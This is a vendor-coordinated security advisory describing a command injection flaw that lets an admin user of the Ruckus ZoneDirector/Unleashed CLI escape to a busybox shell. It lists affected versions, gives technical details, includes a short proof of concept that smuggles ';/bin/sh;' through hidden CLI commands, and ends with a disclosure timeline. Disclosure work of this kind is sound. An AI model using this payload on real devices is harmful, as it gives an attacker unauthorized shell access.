Ruckus CLI (rkscli) jailbreak

Aleph Research Advisory





  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

This is a command injection vulnerability via a crafted CLI command with admin privilege.

/usr/bin/rkscli is a CLI used by Ruckus for user interaction and run commands by their web interface. rkscli has a hidden CLI command Ruckus that writes a limited string to /writable/etc/system/access. !v54! is another hidden command. If !v54! do not receive any arguments it executes /usr/sbin/sesame with that content of /writable/etc/system/access.

Ruckus command can write a command injection payload into /writable/etc/system/access. Then !v54! can execute this payload and this way, escape to busybox shell.

Information about the exploitation of the vulnerability can be found in our 36C3 talk.

Proof Of Concept

Jail breaking Ruckus CLI using this exploit

rkscli: Ruckus <-input ";/bin/sh;"

rkscli: !v54!
What's your chow: 

Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.

ruckus$ echo $USER


  • 31-Dec-19
    : Public disclosure.
  • 24-Dec-19
    : Patch available.
  • 17-Dec-19
    : ALEPH-2019014 assigned.
  • 19-Sep-19
    : Reported (Ruckus Product Security Team).


External References